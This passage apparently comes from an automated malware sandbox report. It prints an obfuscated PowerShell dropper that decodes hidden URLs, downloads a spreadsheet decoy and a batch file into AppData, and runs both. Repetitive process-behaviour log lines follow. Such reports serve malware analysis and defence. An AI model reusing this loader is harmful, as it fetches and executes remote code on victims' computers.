ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden	Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_036A75CF push cs; iretd	1_2_036A75D2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_036A759D push cs; iretd	1_2_036A75C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_036A7B7B push ss; iretd	1_2_036A7B8A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_02F212D8 push esp; retf 0002h	10_2_02F212E1

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 7287
Source: unknown	Network traffic detected: HTTP traffic on port 7287 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 7287
Source: unknown	Network traffic detected: HTTP traffic on port 7287 -> 49731

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
